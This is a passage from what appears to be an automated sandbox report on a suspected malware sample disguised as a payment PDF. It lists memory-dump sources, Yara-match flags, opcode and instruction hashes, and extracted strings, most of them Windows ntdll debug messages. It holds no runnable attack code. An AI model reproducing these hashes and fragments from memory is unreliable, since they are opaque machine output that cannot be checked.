                  • Instruction Fuzzy Hash: 6451F7B6A0451ABFCF11DB9C888097FFBB8BB18248B50C129F4A5D7641E334EE1087E0
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: ___swprintf_l
                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                  • API String ID: 48624451-2108815105
                  • Opcode ID: 4b0d616b84fa41d09e0c3677f7fd44f6cc3624208b08034616816408f549237f
                  • Instruction ID: 07870d4b69bb9f2da438649abf5535cad648d524ddbde6ccdb985888fa22b4ac
                  • Opcode Fuzzy Hash: 4b0d616b84fa41d09e0c3677f7fd44f6cc3624208b08034616816408f549237f
                  • Instruction Fuzzy Hash: 4951F471A00656ABDB22DE5EC994C7FBBF8EB44204B44847BE4D6D37D1E6B4EA008760
                  Strings
                  • Execute=1, xrefs: 013C4713
                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 013C4655
                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 013C46FC
                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 013C4742
                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 013C4787
                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 013C4725
                  • ExecuteOptions, xrefs: 013C46A0
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                  • API String ID: 0-484625025
                  • Opcode ID: f07529de605c541f18efc3c852c2f32e310acf8306fb17c7455b192a829a9e73
                  • Instruction ID: 9835da84f7a9f607c2d03c9e8ac3943d1c4a16c4ffbbfedaaf52e294a5a373a8
                  • Opcode Fuzzy Hash: f07529de605c541f18efc3c852c2f32e310acf8306fb17c7455b192a829a9e73
                  • Instruction Fuzzy Hash: 125127356003096AEF20BBA8DC95FBA77A9AF5471CF1400A9E605A7290EB709E45CF50
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                  • Instruction ID: 361cff617aeba6b67619cba71c5a471a91ffc69d715e0745d9a552dea0c3f9f8
                  • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                  • Instruction Fuzzy Hash: 09025670508352AFD705CF19C490A6FBBE5EFD8704F81892EFA858B264DB71E985CB42
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: __aulldvrm
                  • String ID: +$-$0$0
                  • API String ID: 1302938615-699404926
                  • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                  • Instruction ID: 02f15e79515ceb51fdbb22f5ed44dd524b90f8e55534d37adf7c6024477003f6
                  • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                  • Instruction Fuzzy Hash: 3381D470E052499EEF25CE6CE891FFEFFB1AF45368F184219D851A7299C7349840CB91
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: ___swprintf_l
                  • String ID: %%%u$[$]:%u
                  • API String ID: 48624451-2819853543
                  • Opcode ID: 370fb44b8e579ceb677c9250087ed5ca1d6644324ebaab4a67716a18cf8f906b
                  • Instruction ID: 14311912f038fb75c5304432ac486590644f37c703222b08ef7f3a314f9ce6ea
                  • Opcode Fuzzy Hash: 370fb44b8e579ceb677c9250087ed5ca1d6644324ebaab4a67716a18cf8f906b
                  • Instruction Fuzzy Hash: B521517AA00119ABDB11DF7EC844EEFBBF8EF54644F440126E945E7284E770E9018BA1
                  Strings
                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 013C02BD
                  • RTL: Re-Waiting, xrefs: 013C031E
                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 013C02E7
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                  • API String ID: 0-2474120054
                  • Opcode ID: 8e701be2e5952bef4c32a3215871c5848667e0fc01f0b3dda4527840f62e7814
                  • Instruction ID: b2b41c9d531f0598e04ccfd4606c7f78b98952e9665d232f78eaaec3cbd697b1
                  • Opcode Fuzzy Hash: 8e701be2e5952bef4c32a3215871c5848667e0fc01f0b3dda4527840f62e7814
                  • Instruction Fuzzy Hash: B5E1CE34604781DFE725CF2CC884B2ABBE9BB84728F140A1DF5A58B6E1D778D845CB42
                  Strings
                  • RTL: Re-Waiting, xrefs: 013C7BAC
                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 013C7B7F
                  • RTL: Resource at %p, xrefs: 013C7B8E
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                  • API String ID: 0-871070163
                  • Opcode ID: abdbe22b9c065aef29638ac6744bc6bed9125c1afc3d0d51e67bb6bcc605dccc
                  • Instruction ID: e0ecd2604163cb0332a78b723ae71ed810b5c15bae7f25abebc27a9366e7efd8
                  • Opcode Fuzzy Hash: abdbe22b9c065aef29638ac6744bc6bed9125c1afc3d0d51e67bb6bcc605dccc
                  • Instruction Fuzzy Hash: 0141E1353007039FDB21EF29D840B6AB7E5EF98718F000A1DF95ADB680DB71E8098B91
                  APIs
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 013C728C
                  Strings
                  • RTL: Re-Waiting, xrefs: 013C72C1
                  • RTL: Resource at %p, xrefs: 013C72A3
                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 013C7294
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                  • API String ID: 885266447-605551621
                  • Opcode ID: deb77a2354578e3d5fc303242b3e2d8ad56ad1f563280d06c834e0ccce881144
                  • Instruction ID: d89f21c7ea50b30e9d3d88a68035c4559798781ffb03bc75266e8edac327d93a
                  • Opcode Fuzzy Hash: deb77a2354578e3d5fc303242b3e2d8ad56ad1f563280d06c834e0ccce881144
                  • Instruction Fuzzy Hash: 8941F235700707ABDB20DF29CC41B66B7A6FB94B18F14061DFD55AB640DB31E8028BD1
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: ___swprintf_l
                  • String ID: %%%u$]:%u
                  • API String ID: 48624451-3050659472
                  • Opcode ID: 8bb1db3b8de74a6a604878c0a4cb241c354451397928c3e7c1d7ea9d66e8cdb1
                  • Instruction ID: 15c6f4a5f14cf09192b6a6d7bffb2ab9881f0b7e8d2b2b402fb6bf50e41c0503
                  • Opcode Fuzzy Hash: 8bb1db3b8de74a6a604878c0a4cb241c354451397928c3e7c1d7ea9d66e8cdb1
                  • Instruction Fuzzy Hash: C731A7726001299FDB61DF3DCC44FEFB7F8EB44614F444466E949E3280EB70AA448B60
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: __aulldvrm
                  • String ID: +$-
                  • API String ID: 1302938615-2137968064
                  • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                  • Instruction ID: 0e55a7290639afee77711aa383ce3d25e5106acc39c4f820bc8f162f84f5aa2e
                  • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                  • Instruction Fuzzy Hash: 1191B471E2020A9BEF24DF6DC8816BEBBA5FF84728F14451AE956E72C0E73089458F11
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: $$@
                  • API String ID: 0-1194432280
                  • Opcode ID: cef30475f265ff242d76c68c05629e62894d89aa9ace95b26aba0f9d523beae0
                  • Instruction ID: 7f0e4cd687eeac809c9956c413070de4c856c6c8b2b4a2a387200c390fea2c65
                  • Opcode Fuzzy Hash: cef30475f265ff242d76c68c05629e62894d89aa9ace95b26aba0f9d523beae0
                  • Instruction Fuzzy Hash: 44812C71D00269DBDB35CB58CC44BEEB7B8AB48758F0141DAEA19B7640E7705E84CFA0
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: cac788ea9553f670f50948ea938ef9b83ed56016e9589fc95e0fbfc275b5478d
                  • Instruction ID: 2aec754f4d78d7bcd88bf795008b934b82ffdec0afbe25ec9e93761179dd67ec
                  • Opcode Fuzzy Hash: cac788ea9553f670f50948ea938ef9b83ed56016e9589fc95e0fbfc275b5478d
                  • Instruction Fuzzy Hash: D431A3526587F14ED30E836D08B9675AFC18F5720174EC2EEDADA5F2F3C0888409D3A5
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: %U$($(#$*$*$*$,$,$/,$:-$=$A{$B5$F$I|$J$J.$Ko$N^n'$O+$P$RZ$US$US$U~$V$Y8$\.$\B$a$aj$c$d$f"$jg$m=$n'$nN$p$r$rm$sd$se$wp$z${P$~+$U$o$}
                  • API String ID: 0-1730764222
                  • Opcode ID: 6ca042b01c139293cd50f904abcb97d63b3b34f5a83c3d454ab97027b18e34da
                  • Instruction ID: e4138b1b892e9503f55cde8030b99e7e6e4319d0e9e0fdaadbceeb0fa1b17673
                  • Opcode Fuzzy Hash: 6ca042b01c139293cd50f904abcb97d63b3b34f5a83c3d454ab97027b18e34da
                  • Instruction Fuzzy Hash: 51829FB0905669CFEB24CF05CD98BDDBBB2BB85309F1085D9C0096B385D7796A89CF84
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 6$O$S$\$s
                  • API String ID: 0-3854637164
                  • Opcode ID: 3a85f5dd76d071124ef078b2674213952c9dc58d950a939c1c4ee78c62e7613f
                  • Instruction ID: 13427cadfd90bdb4272777ce9ab8811f687e8ff0b970fb9f75007d8a939adc6c
                  • Opcode Fuzzy Hash: 3a85f5dd76d071124ef078b2674213952c9dc58d950a939c1c4ee78c62e7613f
                  • Instruction Fuzzy Hash: CD4189B2901119BBDB10EBE4DD48EEBB3BCEBC5319F0085A5E90D97140E671BA548BD1
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: *
                  • API String ID: 0-1466852979
                  • Opcode ID: 124912492b919fba64fae893d7071bc66b7a4005a345653cbbef20267b3b8a37
                  • Instruction ID: 40911870c072ab9659c9e0ab7f61d4ff4637346db242208aa0b2b1e88563fc0e
                  • Opcode Fuzzy Hash: 124912492b919fba64fae893d7071bc66b7a4005a345653cbbef20267b3b8a37
                  • Instruction Fuzzy Hash: A411ECB6D11218AF9B40DFE9D9409EEBBFCEF88210F14416AE919F7200E7705A448BA1
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: .O
                  • API String ID: 0-2898085842
                  • Opcode ID: 6a6e59324a088b1541a0c8981052ee54f7a345e73e67bde8c4c44e9b80115172
                  • Instruction ID: 3380eb7bb8ed3e741966a94dc7f8b38e29d590c87dbccc64d499c1a43ed26ee1
                  • Opcode Fuzzy Hash: 6a6e59324a088b1541a0c8981052ee54f7a345e73e67bde8c4c44e9b80115172
                  • Instruction Fuzzy Hash: 171100B6D0121DAF9B40DFE9DD409EEBBFCFF98214F04416AE915E3200E7705A058BA0
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ea483fe6e7ba487e72449aaf4314c4e19db4786a744e564e6bcb2f72ac1963d2
                  • Instruction ID: ecadbb9396cf33c63d573947c9df16b338f8cd27e996bb2f0f24e6f80ef95aac
                  • Opcode Fuzzy Hash: ea483fe6e7ba487e72449aaf4314c4e19db4786a744e564e6bcb2f72ac1963d2
                  • Instruction Fuzzy Hash: B64130B1D11229AFDB14CF99C881EEEBBBCFF49710F10415AF908E6244D3B49641CBA0
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 19848c0c6d74901e6cd8e25695a61db4e23cbb18463e7c5345a9c512cad6b175
                  • Instruction ID: 501a042f1ad3be8a6ebf39c569da42d302bb140e9d8ee0689090303291f6cde7
                  • Opcode Fuzzy Hash: 19848c0c6d74901e6cd8e25695a61db4e23cbb18463e7c5345a9c512cad6b175
                  • Instruction Fuzzy Hash: 9C21FCB5A00209AFDB14DF99DC41EAFB7B9EFC9714F10421AFD19A7240D770B9118BA1
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2f1f047b2e39129f1f86205465f6175a89641b909da98a8f732e2418bb9e1e1a
                  • Instruction ID: 926767ad274d670eedea00cac2320be2e6ced3d5469cf22d1cef0396b360f5ab
                  • Opcode Fuzzy Hash: 2f1f047b2e39129f1f86205465f6175a89641b909da98a8f732e2418bb9e1e1a
                  • Instruction Fuzzy Hash: 9A1182B63802097BF720AA95DC42FAB375C9BC5B15F244029FB08AA2C1E6A5F81146B4
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: eb26a129de2e797be55eb8f8c4c7eb76019c0b3f6b3e3991ff4875d67a0d8d61
                  • Instruction ID: 94bff5458982240587d2a490cc5e9bc771158f27799ded9742bc82d81407a205
                  • Opcode Fuzzy Hash: eb26a129de2e797be55eb8f8c4c7eb76019c0b3f6b3e3991ff4875d67a0d8d61
                  • Instruction Fuzzy Hash: D0214FB5A00609AFDB10EF98DC41EAF77ACEFC9710F144519F919A7244D770B9118BA1
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7fbc166882ec4b0ff2a948b0479d638f0dd42687a08fa90bd35cfcceb8b6e128
                  • Instruction ID: 5c64534286ce0f0c92893649d5422aa28a39c4c6b1f745b53cd8065d2ee9d876
                  • Opcode Fuzzy Hash: 7fbc166882ec4b0ff2a948b0479d638f0dd42687a08fa90bd35cfcceb8b6e128
                  • Instruction Fuzzy Hash: 731194B56012146BE710EBE8CC41FABB3ACEFC5704F04451AFA599B244E774790487A1
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 68c71c70b9abff3a6400cb5734e250b990f3da4031367df7a8a87b4f4fea6d07
                  • Instruction ID: 3b662c8e8f9eb68641b654665de31b08b3a1dc2599898d8c68e38825a824322c
                  • Opcode Fuzzy Hash: 68c71c70b9abff3a6400cb5734e250b990f3da4031367df7a8a87b4f4fea6d07
                  • Instruction Fuzzy Hash: C21151B56006147FE710EBA8CC41FABB3ACEFC5714F444519FA49AB240D7B4B91587A1
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 70a45c35d8941d98dc1e1da6fba7e6003c86319aac15bde987053209a937adb8
                  • Instruction ID: fff3d2623fff355057f33d67a08b8515c7e1dd9705dfbc0b2a6170c4099b8ec3
                  • Opcode Fuzzy Hash: 70a45c35d8941d98dc1e1da6fba7e6003c86319aac15bde987053209a937adb8
                  • Instruction Fuzzy Hash: 7F019DB6214609BFDB44DE99DC80EEB77ADAFCD714F448219FA09E3241D630F8518BA4
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 66fa48cf47522d77af00ea8dc41216d16ba6943682557b65c276a070410e2f78
                  • Instruction ID: 993693d5ba20ca6d16d0572ceb47b33fa6cac1632f4b3e0d607337afe38853c4
                  • Opcode Fuzzy Hash: 66fa48cf47522d77af00ea8dc41216d16ba6943682557b65c276a070410e2f78
                  • Instruction Fuzzy Hash: CC01D7B6C01218AFDB50DFE8D9449EEBBF8BB48200F14466AD915F3200F7705A088BA1
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5fcf813bc6aa1df316adfe20e1c9e674243164f744a91dab0dbb482545eeb1dc
                  • Instruction ID: 200b1454b2333c7dead3ec177a428ea062732a724ad80deac299fed71b05e858
                  • Opcode Fuzzy Hash: 5fcf813bc6aa1df316adfe20e1c9e674243164f744a91dab0dbb482545eeb1dc
                  • Instruction Fuzzy Hash: C1F0E9B36502136BD7205A7DAC81BC6B79CEBC4334F240633F95CC7341D679E45642A0
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7fca821d93e8785011faba77e82fc8df6d39ae2d266b261a8fe7a2952f4becd6
                  • Instruction ID: 648dbcca2edcf85f7235c9a227d30d0e3df500b9e53da386355d04dc60b984c1
                  • Opcode Fuzzy Hash: 7fca821d93e8785011faba77e82fc8df6d39ae2d266b261a8fe7a2952f4becd6
                  • Instruction Fuzzy Hash: D6F01C7A200215BFD710EF99DC41E9B77ADEFC9714F044419FA1897241D670B9118BB4
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b084f4e6bc9802630b2d107301b732096cdfb55f964f1490ca3245cb6ba33282
                  • Instruction ID: d874878a1756e363cbeaabe6e184c799163221f04cc65c72988446e08dd44ce4
                  • Opcode Fuzzy Hash: b084f4e6bc9802630b2d107301b732096cdfb55f964f1490ca3245cb6ba33282
                  • Instruction Fuzzy Hash: B6E06D792003147FE610EE99DC40E9B73ACEFC9714F004019F908A7241D770B81187B4
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d546659230bf0b880cfb1d82b0ce6dffacfcb78952df54a640702805183dfc1e
                  • Instruction ID: 29d17da27ae02192683700fa7e800bb116e2a2f4a671e7bc356b9994006f6d9f
                  • Opcode Fuzzy Hash: d546659230bf0b880cfb1d82b0ce6dffacfcb78952df54a640702805183dfc1e
                  • Instruction Fuzzy Hash: 9CF08971815109EBDB18CFA4D841BDDB7B4EB45320F1083BDE8189B280D634A7509791
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 90029ec0a1fe2d4b8e805dd88c2b5fb9c21bd0afa8bb0a8563cd9a31df341a19
                  • Instruction ID: 2828667be89b3dbc04df75fec751f8fc79c527d6c7347c858e9b1c314d0ef420
                  • Opcode Fuzzy Hash: 90029ec0a1fe2d4b8e805dd88c2b5fb9c21bd0afa8bb0a8563cd9a31df341a19
                  • Instruction Fuzzy Hash: 1AE01A7A204214BFE714EE99EC45EEB77ACEFC9714F144419FA08A7281D670B9128BF4
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0d7d1f241b9b39758da976e556aba62b8b8826a23ae8093ca9654820bddab7fe
                  • Instruction ID: 8847fa199546bd93d9d2f51e67a853d60be97377c1067b8dba928a3e5017ca1d
                  • Opcode Fuzzy Hash: 0d7d1f241b9b39758da976e556aba62b8b8826a23ae8093ca9654820bddab7fe
                  • Instruction Fuzzy Hash: D0E0867374021437D62069E9DC05F97775CCBC1E70F154075FE0C9B340E661B90182E5
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7188be8533a92404b12686b301f9a776110fe1c2ec124cdf289fe97694c73514
                  • Instruction ID: 7bfaef6361105b6c5a73264bd90240c9ab4533006986652a02566ca918f569e3
                  • Opcode Fuzzy Hash: 7188be8533a92404b12686b301f9a776110fe1c2ec124cdf289fe97694c73514
                  • Instruction Fuzzy Hash: D1E06571915108EBDB0CCFA4E441B9DB764DB45211F2083B9F819DB280D739EB549751
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 91de5def3585cfe60dddf9ff454c7c0e50eace4dd2efa41be2c5c793dc76b1da
                  • Instruction ID: eaa18a45cc7a6ebceea693a63ccf8d6cedebe81357e1d9947b5c711055506c8d
                  • Opcode Fuzzy Hash: 91de5def3585cfe60dddf9ff454c7c0e50eace4dd2efa41be2c5c793dc76b1da
                  • Instruction Fuzzy Hash: B7E086392402147BE610FB59DC00F9B775CEFC5714F544029FA08A7241CB70B90587F0
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5a4eb5ba94fc0e1499d15df3b00891cf86836717f8d5fba82d43419959557c2b
                  • Instruction ID: 41a0ff2d4234ad9acec0f6e65318097aa5663ba88d9e953dffdfe14cb1d20804
                  • Opcode Fuzzy Hash: 5a4eb5ba94fc0e1499d15df3b00891cf86836717f8d5fba82d43419959557c2b
                  • Instruction Fuzzy Hash: 2CC012B66103086FEB00EA88CC46F66339C9B88620F4080A1BA0C8B681E6B1B91086A5
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
